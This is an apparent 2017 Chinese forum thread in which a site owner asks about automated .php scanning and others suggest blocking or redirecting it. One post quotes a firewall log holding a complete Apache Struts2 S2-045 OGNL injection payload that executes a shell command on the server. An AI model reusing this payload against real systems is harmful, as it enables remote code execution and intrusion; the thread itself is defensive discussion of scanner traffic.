1 10467106 2017-08-26 16:59:44 +08:00 via iPhone 可以关站 |
![]() | 2 UnisandK 2017-08-26 17:00:53 +08:00 自动扫描的吧 |
![]() | 3 ETiV 2017-08-26 17:02:19 +08:00 via iPhone 可能没人蓄意攻击你,都是自动扫的 可以把\.php$的日志关了 |
![]() | 4 wwqgtxx 2017-08-26 17:07:31 +08:00 via iPhone 在前端( nginx )上直接把所有.php 返回 503 就好了 |
5 xiayibu OP 安全狗提示这种攻击 拦截原因: HTTP 头部字段:HTTP_CONTENT-TYPE 包含内容:{(#Normal='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#cOntainer=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} |
![]() | 6 fzleee 2017-08-26 18:22:00 +08:00 via iPhone redirect 到某些不可访问的网站 |
![]() | 7 jugelizi 2017-08-26 18:26:05 +08:00 很正常 我 java 站每天海内外的 php 请求 php 站的 asp 请求 |
![]() | 8 Felldeadbird 2017-08-26 21:35:28 +08:00 via iPhone 这种都是脚本批量检测的。 |
![]() | 9 ferock PRO 告诉对方,你的网站不是 php ! |
![]() | 10 Sanko 2017-08-26 23:31:16 +08:00 via Android ![]() HttpResponse('哈麻批劳资是 python') |
11 zingl 2017-08-27 02:39:22 +08:00 向 ip 拥有者举证投诉 |
![]() | 12 ysc3839 2017-08-27 05:11:40 +08:00 via Android ![]() 听说过这样事,静态站,总有人扫 php,于是站长就把 php 全都重定向到一个很大的文件,比如 VPS 的测速文件。 |
13 KgM4gLtF0shViDH3 2017-08-27 08:56:47 +08:00 via Android 可能是新手在学 sqlmap ? |
![]() | 15 kylinking 2017-08-27 09:14:52 +08:00 via iPhone @xiayibu 这不是 PHP 注入攻击,而是针对前段时间的 S2-045 漏洞,一般都是批量扫描的,发现有漏洞后会下载一些挖矿样本或者 DDoS 程序。 |
![]() | 16 fcka 2017-08-27 10:11:58 +08:00 via Android 看看来源 ip,可能是阿里云的云盾干的…… |
17 bearqq 2017-08-27 10:20:55 +08:00 @application.route('<p:re:.*>') def other(p): if ('php' in request.environ.get('bottle.raw_path')) or (request.environ.get('REMOTE_ADDR') in config.blacklist): return redirect('http://cachefly.cachefly.net/100mb.test') else: abort(404) |
18 xinxin9527 2017-09-18 14:36:00 +08:00 应该是自动扫描的,现在好多平台不间断的在全网扫描漏洞,并收入漏洞库,存在这种可能性。 只要不影响主站访问,也倒没有什么,但如果题主看着觉得糟心,可以使用云防御来防护也是不错的。 比如:知道创宇抗 D 保、百度云加速、前期网站访问量小,可以使用免费套餐的就够用了哈 |